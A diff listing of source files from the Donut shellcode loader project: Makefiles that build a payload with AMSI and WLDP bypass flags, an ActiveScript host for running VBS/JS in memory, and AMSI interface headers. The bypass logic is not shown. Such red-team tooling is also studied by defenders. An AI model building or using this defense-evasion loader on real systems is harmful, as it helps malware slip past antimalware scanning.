2 exe2h/exe2h payload.exe
3 x86:
4 i686-w64-mingw32-gcc -DBYPASS_AMSI_A -DBYPASS_WLDP_A -fno-toplevel-reorder -fpack-struct=8 -fPIC -O0 -nostdlib payload.c clib.c ../hash.c ../encrypt.c -I ../include -opayload.exe
5 exe2h/exe2h payload.exe
6 debug_x64:
7 x86_64-w64-mingw32-gcc -DCLIB -DBYPASS_AMSI_A -DBYPASS_WLDP_A -Wno-format -fpack-struct=8 -DDEBUG -I ../include payload.c ../hash.c ../encrypt.c clib.c -opayload.exe
8 debug_x86:
9 i686-w64-mingw32-gcc -DCLIB -DBYPASS_AMSI_A -DBYPASS_WLDP_A -Wno-format -fpack-struct=8 -DDEBUG -I ../include payload.c ../hash.c ../encrypt.c clib.c -opayload.exe
10 clean:
11 rm *.o payload.exe
+0
-9
payload/Makefile.msvc less more
0 payload:
1 cl -DBYPASS_AMSI_A -DBYPASS_WLDP_A -Zp8 -c -nologo -Gy -Os -O1 -GR- -EHa -Oi -GS- -I ..\include payload.c ..\hash.c ..\encrypt.c clib.c
2 link -nologo -order:@order.txt -entry:ThreadProc -fixed -subsystem:console -nodefaultlib payload.obj hash.obj encrypt.obj clib.obj
3 exe2h\exe2h payload.exe
4 debug:
5 cl -DDEBUG -DBYPASS_AMSI_A -DBYPASS_WLDP_A -Zp8 -c -nologo -Gy -Os -EHa -GS- -I ..\include payload.c ..\hash.c ..\encrypt.c clib.c
6 link -nologo -order:@order.txt -subsystem:console payload.obj hash.obj encrypt.obj clib.obj
7 clean:
8 del *.obj payload.exe
+0
-186
payload/activescript.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 // initialize virtual function table
32 static VOID ActiveScript_New(PDONUT_INSTANCE inst, IActiveScriptSite *this) {
33 MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
34
35 // Initialize IUnknown
36 mas->site.lpVtbl->QueryInterface = ADR(LPVOID, ActiveScript_QueryInterface);
37 mas->site.lpVtbl->AddRef = ADR(LPVOID, ActiveScript_AddRef);
38 mas->site.lpVtbl->Release = ADR(LPVOID, ActiveScript_Release);
39
40 // Initialize IActiveScriptSite
41 mas->site.lpVtbl->GetLCID = ADR(LPVOID, ActiveScript_GetLCID);
42 mas->site.lpVtbl->GetItemInfo = ADR(LPVOID, ActiveScript_GetItemInfo);
43 mas->site.lpVtbl->GetDocVersionString = ADR(LPVOID, ActiveScript_GetDocVersionString);
44 mas->site.lpVtbl->OnScriptTerminate = ADR(LPVOID, ActiveScript_OnScriptTerminate);
45 mas->site.lpVtbl->OnStateChange = ADR(LPVOID, ActiveScript_OnStateChange);
46 mas->site.lpVtbl->OnScriptError = ADR(LPVOID, ActiveScript_OnScriptError);
47 mas->site.lpVtbl->OnEnterScript = ADR(LPVOID, ActiveScript_OnEnterScript);
48 mas->site.lpVtbl->OnLeaveScript = ADR(LPVOID, ActiveScript_OnLeaveScript);
49
50 mas->site.m_cRef = 0;
51 mas->inst = inst;
52 }
53
54 static STDMETHODIMP ActiveScript_QueryInterface(IActiveScriptSite *this, REFIID riid, void **ppv) {
55 MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
56
57 DPRINT("IActiveScriptSite::QueryInterface");
58
59 if(ppv == NULL) return E_POINTER;
60
61 // we implement the following interfaces
62 if(IsEqualIID(&mas->inst->xIID_IUnknown, riid) ||
63 IsEqualIID(&mas->inst->xIID_IActiveScriptSite, riid))
64 {
65 *ppv = (LPVOID)this;
66 ActiveScript_AddRef(this);
67 return S_OK;
68 }
69 *ppv = NULL;
70 return E_NOINTERFACE;
71 }
72
73 static STDMETHODIMP_(ULONG) ActiveScript_AddRef(IActiveScriptSite *this) {
74 MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
75
76 _InterlockedIncrement(&mas->site.m_cRef);
77
78 DPRINT("IActiveScriptSite::AddRef : m_cRef : %i\n", mas->site.m_cRef);
79
80 return mas->site.m_cRef;
81 }
82
83 static STDMETHODIMP_(ULONG) ActiveScript_Release(IActiveScriptSite *this) {
84 MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
85
86 ULONG ulRefCount = _InterlockedDecrement(&mas->site.m_cRef);
87
88 DPRINT("IActiveScriptSite::Release : m_cRef : %i\n", ulRefCount);
89 return ulRefCount;
90 }
91
92 static STDMETHODIMP ActiveScript_GetItemInfo(IActiveScriptSite *this,
93 LPCOLESTR objectName, DWORD dwReturnMask,
94 IUnknown **objPtr, ITypeInfo **ppti)
95 {
96 MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
97
98 DPRINT("IActiveScriptSite::GetItemInfo");
99
100 if(dwReturnMask & SCRIPTINFO_ITYPEINFO) {
101 DPRINT("Caller is requesting SCRIPTINFO_ITYPEINFO.");
102 if(ppti == NULL) return E_POINTER;
103
104 mas->wscript.lpTypeInfo->lpVtbl->AddRef(mas->wscript.lpTypeInfo);
105 *ppti = mas->wscript.lpTypeInfo;
106 }
107
108 if(dwReturnMask & SCRIPTINFO_IUNKNOWN) {
109 DPRINT("Caller is requesting SCRIPTINFO_IUNKNOWN.");
110 if(objPtr == NULL) return E_POINTER;
111
112 mas->wscript.lpVtbl->AddRef(&mas->wscript);
113 *objPtr = (IUnknown*)&mas->wscript;
114 }
115
116 return S_OK;
117 }
118
119 static STDMETHODIMP ActiveScript_OnScriptError(IActiveScriptSite *this,
120 IActiveScriptError *scriptError)
121 {
122 DPRINT("IActiveScriptSite::OnScriptError");
123
124 EXCEPINFO ei;
125 DWORD dwSourceContext = 0;
126 ULONG ulLineNumber = 0;
127 LONG ichCharPosition = 0;
128 HRESULT hr;
129
130 Memset(&ei, 0, sizeof(EXCEPINFO));
131
132 DPRINT("IActiveScriptError::GetExceptionInfo");
133 hr = scriptError->lpVtbl->GetExceptionInfo(scriptError, &ei);
134 if(hr == S_OK) {
135 DPRINT("IActiveScriptError::GetSourcePosition");
136 hr = scriptError->lpVtbl->GetSourcePosition(
137 scriptError, &dwSourceContext,
138 &ulLineNumber, &ichCharPosition);
139 if(hr == S_OK) {
140 DPRINT("JSError: %ws line[%d:%d]\n",
141 ei.bstrDescription, ulLineNumber, ichCharPosition);
142 }
143 }
144 return S_OK;
145 }
146
147 static STDMETHODIMP ActiveScript_GetLCID(IActiveScriptSite *this, LCID *plcid) {
148 DPRINT("IActiveScriptSite::GetLCID");
149 MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
150
151 *plcid = mas->inst->api.GetUserDefaultLCID();
152 return S_OK;
153 }
154
155 static STDMETHODIMP ActiveScript_GetDocVersionString(IActiveScriptSite *this, BSTR *version) {
156 DPRINT("IActiveScriptSite::GetDocVersionString");
157
158 return S_OK;
159 }
160
161 static STDMETHODIMP ActiveScript_OnScriptTerminate(IActiveScriptSite *this,
162 const VARIANT *pvr, const EXCEPINFO *pei)
163 {
164 DPRINT("IActiveScriptSite::OnScriptTerminate");
165
166 return S_OK;
167 }
168
169 static STDMETHODIMP ActiveScript_OnStateChange(IActiveScriptSite *this, SCRIPTSTATE state) {
170 DPRINT("IActiveScriptSite::OnStateChange");
171
172 return S_OK;
173 }
174
175 static STDMETHODIMP ActiveScript_OnEnterScript(IActiveScriptSite *this) {
176 DPRINT("IActiveScriptSite::OnEnterScript");
177
178 return S_OK;
179 }
180
181 static STDMETHODIMP ActiveScript_OnLeaveScript(IActiveScriptSite *this) {
182 DPRINT("IActiveScriptSite::OnLeaveScript");
183
184 return S_OK;
185 }
+0
-436
payload/activescript.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef IACTIVESCRIPT_H
32 #define IACTIVESCRIPT_H
33
34 #include "../include/donut.h"
35
36 // required to load and run VBS or JS files
37 typedef struct _IActiveScript IActiveScript;
38 typedef struct _IActiveScriptError IActiveScriptError;
39 typedef struct _IActiveScriptSite IActiveScriptSite;
40 typedef struct _IActiveScriptSiteWindow IActiveScriptSiteWindow;
41 typedef struct _IActiveScriptParse32 IActiveScriptParse32;
42 typedef struct _IActiveScriptParse64 IActiveScriptParse64;
43
44 typedef enum tagSCRIPTSTATE {
45 SCRIPTSTATE_UNINITIALIZED = 0,
46 SCRIPTSTATE_STARTED = 1,
47 SCRIPTSTATE_CONNECTED = 2,
48 SCRIPTSTATE_DISCONNECTED = 3,
49 SCRIPTSTATE_CLOSED = 4,
50 SCRIPTSTATE_INITIALIZED = 5
51 } SCRIPTSTATE;
52
53 typedef enum tagSCRIPTTHREADSTATE {
54 SCRIPTTHREADSTATE_NOTINSCRIPT = 0,
55 SCRIPTTHREADSTATE_RUNNING = 1
56 } SCRIPTTHREADSTATE;
57
58 #define SCRIPTTHREADID_CURRENT 0xFFFFFFFD // The currently executing thread.
59 #define SCRIPTTHREADID_BASE 0xFFFFFFFE // The base thread; that is, the thread in which the scripting engine was instantiated.
60 #define SCRIPTTHREADID_ALL 0xFFFFFFFF // All threads.
61
62 typedef DWORD SCRIPTTHREADID;
63
64 #define SCRIPTITEM_ISPERSISTENT 0x00000001
65 #define SCRIPTITEM_ISVISIBLE 0x00000002
66 #define SCRIPTITEM_ISSOURCE 0x00000004
67 #define SCRIPTITEM_GLOBALMEMBERS 0x00000008
68 #define SCRIPTITEM_EXISTS 0x00000080
69 #define SCRIPTITEM_MULTIINSTANCE 0x00000100
70 #define SCRIPTITEM_CODEONLY 0x00000200
71
72 #define SCRIPTTEXT_ISPERSISTENT 0x00000001
73 #define SCRIPTTEXT_ISVISIBLE 0x00000002
74 #define SCRIPTTEXT_ISEXPRESSION 0x00000020
75 #define SCRIPTTEXT_KEEPDEFINITIONS 0x00000040
76 #define SCRIPTTEXT_ALLOWEXECUTION 0x00000400
77 #define SCRIPTTEXT_ALL_FLAGS (SCRIPTTEXT_ISPERSISTENT | \
78 SCRIPTTEXT_ISVISIBLE | \
79 SCRIPTTEXT_ISEXPRESSION | \
80 SCRIPTTEXT_KEEPDEFINITIONS | \
81 SCRIPTTEXT_ALLOWEXECUTION)
82
83 #define SCRIPTTEXT_HOSTMANAGESSOURCE 0x00000080
84 #define SCRIPTINFO_IUNKNOWN 0x00000001
85 #define SCRIPTINFO_ITYPEINFO 0x00000002
86 #define SCRIPTINFO_ALL_FLAGS (SCRIPTINFO_IUNKNOWN | SCRIPTINFO_ITYPEINFO)
87
88 typedef struct IActiveScriptVtbl {
89 BEGIN_INTERFACE
90
91 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
92 IActiveScript * This,
93 /* [in] */ REFIID riid,
94 /* [annotation][iid_is][out] */
95 void **ppvObject);
96
97 ULONG ( STDMETHODCALLTYPE *AddRef )(
98 IActiveScript * This);
99
100 ULONG ( STDMETHODCALLTYPE *Release )(
101 IActiveScript * This);
102
103 HRESULT ( STDMETHODCALLTYPE *SetScriptSite )(
104 IActiveScript * This,
105 /* [in] */ IActiveScriptSite *pass);
106
107 HRESULT ( STDMETHODCALLTYPE *GetScriptSite )(
108 IActiveScript * This,
109 /* [in] */ REFIID riid,
110 /* [iid_is][out] */ void **ppvObject);
111
112 HRESULT ( STDMETHODCALLTYPE *SetScriptState )(
113 IActiveScript * This,
114 /* [in] */ SCRIPTSTATE ss);
115
116 HRESULT ( STDMETHODCALLTYPE *GetScriptState )(
117 IActiveScript * This,
118 /* [out] */ SCRIPTSTATE *pssState);
119
120 HRESULT ( STDMETHODCALLTYPE *Close )(
121 IActiveScript * This);
122
123 HRESULT ( STDMETHODCALLTYPE *AddNamedItem )(
124 IActiveScript * This,
125 /* [in] */ LPCOLESTR pstrName,
126 /* [in] */ DWORD dwFlags);
127
128 HRESULT ( STDMETHODCALLTYPE *AddTypeLib )(
129 IActiveScript * This,
130 /* [in] */ REFGUID rguidTypeLib,
131 /* [in] */ DWORD dwMajor,
132 /* [in] */ DWORD dwMinor,
133 /* [in] */ DWORD dwFlags);
134
135 HRESULT ( STDMETHODCALLTYPE *GetScriptDispatch )(
136 IActiveScript * This,
137 /* [in] */ LPCOLESTR pstrItemName,
138 /* [out] */ IDispatch **ppdisp);
139
140 HRESULT ( STDMETHODCALLTYPE *GetCurrentScriptThreadID )(
141 IActiveScript * This,
142 /* [out] */ SCRIPTTHREADID *pstidThread);
143
144 HRESULT ( STDMETHODCALLTYPE *GetScriptThreadID )(
145 IActiveScript * This,
146 /* [in] */ DWORD dwWin32ThreadId,
147 /* [out] */ SCRIPTTHREADID *pstidThread);
148
149 HRESULT ( STDMETHODCALLTYPE *GetScriptThreadState )(
150 IActiveScript * This,
151 /* [in] */ SCRIPTTHREADID stidThread,
152 /* [out] */ SCRIPTTHREADSTATE *pstsState);
153
154 HRESULT ( STDMETHODCALLTYPE *InterruptScriptThread )(
155 IActiveScript * This,
156 /* [in] */ SCRIPTTHREADID stidThread,
157 /* [in] */ const EXCEPINFO *pexcepinfo,
158 /* [in] */ DWORD dwFlags);
159
160 HRESULT ( STDMETHODCALLTYPE *Clone )(
161 IActiveScript * This,
162 /* [out] */ IActiveScript **ppscript);
163
164 END_INTERFACE
165 } IActiveScriptVtbl;
166
167 typedef struct _IActiveScript {
168 IActiveScriptVtbl *lpVtbl;
169 } ActiveScript;
170
171 typedef struct IActiveScriptParse32Vtbl {
172 BEGIN_INTERFACE
173
174 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
175 IActiveScriptParse32 * This,
176 /* [in] */ REFIID riid,
177 /* [annotation][iid_is][out] */
178 void **ppvObject);
179
180 ULONG ( STDMETHODCALLTYPE *AddRef )(
181 IActiveScriptParse32 * This);
182
183 ULONG ( STDMETHODCALLTYPE *Release )(
184 IActiveScriptParse32 * This);
185
186 HRESULT ( STDMETHODCALLTYPE *InitNew )(
187 IActiveScriptParse32 * This);
188
189 HRESULT ( STDMETHODCALLTYPE *AddScriptlet )(
190 IActiveScriptParse32 * This,
191 /* [in] */ LPCOLESTR pstrDefaultName,
192 /* [in] */ LPCOLESTR pstrCode,
193 /* [in] */ LPCOLESTR pstrItemName,
194 /* [in] */ LPCOLESTR pstrSubItemName,
195 /* [in] */ LPCOLESTR pstrEventName,
196 /* [in] */ LPCOLESTR pstrDelimiter,
197 /* [in] */ DWORD dwSourceContextCookie,
198 /* [in] */ ULONG ulStartingLineNumber,
199 /* [in] */ DWORD dwFlags,
200 /* [out] */ BSTR *pbstrName,
201 /* [out] */ EXCEPINFO *pexcepinfo);
202
203 HRESULT ( STDMETHODCALLTYPE *ParseScriptText )(
204 IActiveScriptParse32 * This,
205 /* [in] */ LPCOLESTR pstrCode,
206 /* [in] */ LPCOLESTR pstrItemName,
207 /* [in] */ IUnknown *punkContext,
208 /* [in] */ LPCOLESTR pstrDelimiter,
209 /* [in] */ DWORD dwSourceContextCookie,
210 /* [in] */ ULONG ulStartingLineNumber,
211 /* [in] */ DWORD dwFlags,
212 /* [out] */ VARIANT *pvarResult,
213 /* [out] */ EXCEPINFO *pexcepinfo);
214
215 END_INTERFACE
216 } IActiveScriptParse32Vtbl;
217
218 typedef struct _IActiveScriptParse32 {
219 IActiveScriptParse32Vtbl *lpVtbl;
220 } ActiveScriptParse32;
221
222 typedef struct IActiveScriptParse64Vtbl {
223 BEGIN_INTERFACE
224
225 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
226 IActiveScriptParse64 * This,
227 /* [in] */ REFIID riid,
228 /* [annotation][iid_is][out] */
229 void **ppvObject);
230
231 ULONG ( STDMETHODCALLTYPE *AddRef )(
232 IActiveScriptParse64 * This);
233
234 ULONG ( STDMETHODCALLTYPE *Release )(
235 IActiveScriptParse64 * This);
236
237 HRESULT ( STDMETHODCALLTYPE *InitNew )(
238 IActiveScriptParse64 * This);
239
240 HRESULT ( STDMETHODCALLTYPE *AddScriptlet )(
241 IActiveScriptParse64 *This,
242 /* [in] */ LPCOLESTR pstrDefaultName,
243 /* [in] */ LPCOLESTR pstrCode,
244 /* [in] */ LPCOLESTR pstrItemName,
245 /* [in] */ LPCOLESTR pstrSubItemName,
246 /* [in] */ LPCOLESTR pstrEventName,
247 /* [in] */ LPCOLESTR pstrDelimiter,
248 /* [in] */ DWORDLONG dwSourceContextCookie,
249 /* [in] */ ULONG ulStartingLineNumber,
250 /* [in] */ DWORD dwFlags,
251 /* [out] */ BSTR *pbstrName,
252 /* [out] */ EXCEPINFO *pexcepinfo);
253
254 HRESULT ( STDMETHODCALLTYPE *ParseScriptText )(
255 IActiveScriptParse64 *This,
256 /* [in] */ LPCOLESTR pstrCode,
257 /* [in] */ LPCOLESTR pstrItemName,
258 /* [in] */ IUnknown *punkContext,
259 /* [in] */ LPCOLESTR pstrDelimiter,
260 /* [in] */ DWORDLONG dwSourceContextCookie,
261 /* [in] */ ULONG ulStartingLineNumber,
262 /* [in] */ DWORD dwFlags,
263 /* [out] */ VARIANT *pvarResult,
264 /* [out] */ EXCEPINFO *pexcepinfo);
265
266 END_INTERFACE
267 } IActiveScriptParse64Vtbl;
268
269 typedef struct _IActiveScriptParse64 {
270 IActiveScriptParse64Vtbl *lpVtbl;
271 } ActiveScriptParse64;
272
273 typedef struct _IActiveScriptSiteWindowVtbl {
274 BEGIN_INTERFACE
275
276 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
277 IActiveScriptSiteWindow * This,
278 /* [in] */ REFIID riid,
279 /* [annotation][iid_is][out] */
280 void **ppvObject);
281
282 ULONG ( STDMETHODCALLTYPE *AddRef )(
283 IActiveScriptSiteWindow * This);
284
285 ULONG ( STDMETHODCALLTYPE *Release )(
286 IActiveScriptSiteWindow * This);
287
288 HRESULT ( STDMETHODCALLTYPE *GetWindow )(
289 IActiveScriptSiteWindow * This,
290 /* [out] */ HWND *phwnd);
291
292 HRESULT ( STDMETHODCALLTYPE *EnableModeless )(
293 IActiveScriptSiteWindow * This,
294 /* [in] */ BOOL fEnable);
295
296 END_INTERFACE
297 } IActiveScriptSiteWindowVtbl;
298
299 typedef struct _IActiveScriptSiteWindow {
300 IActiveScriptSiteWindowVtbl *lpVtbl;
301 } ActiveScriptSiteWindow;
302
303 typedef struct _IActiveScriptErrorVtbl {
304 BEGIN_INTERFACE
305
306 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
307 IActiveScriptError * This,
308 /* [in] */ REFIID riid,
309 /* [annotation][iid_is][out] */
310 void **ppvObject);
311
312 ULONG ( STDMETHODCALLTYPE *AddRef )(
313 IActiveScriptError * This);
314
315 ULONG ( STDMETHODCALLTYPE *Release )(
316 IActiveScriptError * This);
317
318 /* [local] */ HRESULT ( STDMETHODCALLTYPE *GetExceptionInfo )(
319 IActiveScriptError * This,
320 /* [out] */ EXCEPINFO *pexcepinfo);
321
322 HRESULT ( STDMETHODCALLTYPE *GetSourcePosition )(
323 IActiveScriptError * This,
324 /* [out] */ DWORD *pdwSourceContext,
325 /* [out] */ ULONG *pulLineNumber,
326 /* [out] */ LONG *plCharacterPosition);
327
328 HRESULT ( STDMETHODCALLTYPE *GetSourceLineText )(
329 IActiveScriptError * This,
330 /* [out] */ BSTR *pbstrSourceLine);
331
332 END_INTERFACE
333 } IActiveScriptErrorVtbl;
334
335 typedef struct _IActiveScriptError {
336 IActiveScriptErrorVtbl *lpVtbl;
337 } ActiveScriptError;
338
339 typedef struct _IActiveScriptSiteVtbl {
340 BEGIN_INTERFACE
341
342 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
343 IActiveScriptSite * This,
344 /* [in] */ REFIID riid,
345 /* [annotation][iid_is][out] */
346 void **ppvObject);
347
348 ULONG ( STDMETHODCALLTYPE *AddRef )(
349 IActiveScriptSite * This);
350
351 ULONG ( STDMETHODCALLTYPE *Release )(
352 IActiveScriptSite * This);
353
354 HRESULT ( STDMETHODCALLTYPE *GetLCID )(
355 IActiveScriptSite * This,
356 /* [out] */ LCID *plcid);
357
358 HRESULT ( STDMETHODCALLTYPE *GetItemInfo )(
359 IActiveScriptSite * This,
360 /* [in] */ LPCOLESTR pstrName,
361 /* [in] */ DWORD dwReturnMask,
362 /* [out] */ IUnknown **ppiunkItem,
363 /* [out] */ ITypeInfo **ppti);
364
365 HRESULT ( STDMETHODCALLTYPE *GetDocVersionString )(
366 IActiveScriptSite * This,
367 /* [out] */ BSTR *pbstrVersion);
368
369 HRESULT ( STDMETHODCALLTYPE *OnScriptTerminate )(
370 IActiveScriptSite * This,
371 /* [in] */ const VARIANT *pvarResult,
372 /* [in] */ const EXCEPINFO *pexcepinfo);
373
374 HRESULT ( STDMETHODCALLTYPE *OnStateChange )(
375 IActiveScriptSite * This,
376 /* [in] */ SCRIPTSTATE ssScriptState);
377
378 HRESULT ( STDMETHODCALLTYPE *OnScriptError )(
379 IActiveScriptSite * This,
380 /* [in] */ IActiveScriptError *pscripterror);
381
382 HRESULT ( STDMETHODCALLTYPE *OnEnterScript )(
383 IActiveScriptSite * This);
384
385 HRESULT ( STDMETHODCALLTYPE *OnLeaveScript )(
386 IActiveScriptSite * This);
387
388 END_INTERFACE
389 } IActiveScriptSiteVtbl;
390
391 typedef struct _IActiveScriptSite {
392 IActiveScriptSiteVtbl *lpVtbl;
393 ULONG m_cRef; // reference count (not part of original definition of course)
394 } ActiveScriptSite;
395
396 #ifdef _WIN64
397 #define IActiveScriptParse IActiveScriptParse64
398 #define IID_IActiveScriptParse IID_IActiveScriptParse64
399 #else
400 #define IActiveScriptParse IActiveScriptParse32
401 #define IID_IActiveScriptParse IID_IActiveScriptParse32
402 #endif
403
404 static VOID ActiveScript_New(PDONUT_INSTANCE inst, IActiveScriptSite *this);
405
406 static STDMETHODIMP ActiveScript_QueryInterface(IActiveScriptSite *this, REFIID riid, void **ppv);
407 static STDMETHODIMP_(ULONG) ActiveScript_AddRef(IActiveScriptSite *this);
408 static STDMETHODIMP_(ULONG) ActiveScript_Release(IActiveScriptSite *this);
409
410 // Informs the host that the scripting engine has begun executing the script code.
411 static STDMETHODIMP ActiveScript_OnEnterScript(IActiveScriptSite *this);
412
413 // Informs the host that the scripting engine has returned from executing script code.
414 static STDMETHODIMP ActiveScript_OnLeaveScript(IActiveScriptSite *this);
415
416 // Retrieves the locale identifier that the host uses for displaying user-interface elements.
417 static STDMETHODIMP ActiveScript_GetLCID(IActiveScriptSite *this, LCID *lcid);
418
419 // Retrieves a host-defined string that uniquely identifies the current document version from the host's point of view.
420 static STDMETHODIMP ActiveScript_GetDocVersionString(IActiveScriptSite *this, BSTR *version);
421
422 // Informs the host that an execution error occurred while the engine was running the script.
423 static STDMETHODIMP ActiveScript_OnScriptError(IActiveScriptSite *this, IActiveScriptError *scriptError);
424
425 // Informs the host that the scripting engine has changed states.
426 static STDMETHODIMP ActiveScript_OnStateChange(IActiveScriptSite *this, SCRIPTSTATE state);
427
428 // Obtains information about an item that was added to an engine through a call to the IActiveScript::AddNamedItem method.
429 static STDMETHODIMP ActiveScript_GetItemInfo(IActiveScriptSite *this, LPCOLESTR objectName, DWORD dwReturnMask, IUnknown **objPtr, ITypeInfo **typeInfo);
430
431 // Called when the script has completed execution.
432 static STDMETHODIMP ActiveScript_OnScriptTerminate(IActiveScriptSite *this, const VARIANT *pvr, const EXCEPINFO *pei);
433
434 #endif
435
+0
-182
payload/amsi.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef AMSI_H
32 #define AMSI_H
33
34 #include <windows.h>
35
36 DECLARE_HANDLE(HAMSICONTEXT);
37 DECLARE_HANDLE(HAMSISESSION);
38
39 typedef struct _IAmsiStream IAmsiStream;
40 typedef struct _IAntimalware IAntimalware;
41 typedef struct _IAntimalwareProvider IAntimalwareProvider;
42
43 typedef enum tagAMSI_RESULT {
44 // No detection found. Result likely not going to change after future definition update.
45 // a.k.a. known good
46 AMSI_RESULT_CLEAN = 0,
47 // No detection found. Result might change after future definition update.
48 AMSI_RESULT_NOT_DETECTED = 1,
49 // Detection found. It is recommended to abort executing the content if it is executable, e.g. a script.
50 // Return result of 1 - 32767 is estimated risk level that an antimalware provider might indicate.
51 // The large the result, the riskier to continue.
52 // Any return result equal to or larger than 32768 is consider malware and should be blocked.
53 // These values are provider specific, and may indicate malware family or ID.
54 // An application should use AmsiResultIsMalware() to determine whether the content should be blocked.
55 AMSI_RESULT_DETECTED = 32768,
56 } AMSI_RESULT;
57
58 typedef enum tagAMSI_ATTRIBUTE {
59 // Name/version/GUID string of the calling application.
60 AMSI_ATTRIBUTE_APP_NAME = 0,
61 // LPWSTR, filename, URL, script unique id etc.
62 AMSI_ATTRIBUTE_CONTENT_NAME = 1,
63 // ULONGLONG, size of the input. Mandatory.
64 AMSI_ATTRIBUTE_CONTENT_SIZE = 2,
65 // PVOID, memory address if content is fully loaded in memory. Mandatory unless
66 // Read() is implemented instead to support on-demand content retrieval.
67 AMSI_ATTRIBUTE_CONTENT_ADDRESS = 3,
68 // PVOID, session is used to associate different scan calls, e.g. if the contents
69 // to be scanned belong to the sample original script. Return nullptr if content
70 // is self-contained. Mandatory.
71 AMSI_ATTRIBUTE_SESSION = 4,
72 } AMSI_ATTRIBUTE;
73
74 typedef struct IAmsiStreamVtbl {
75 BEGIN_INTERFACE
76
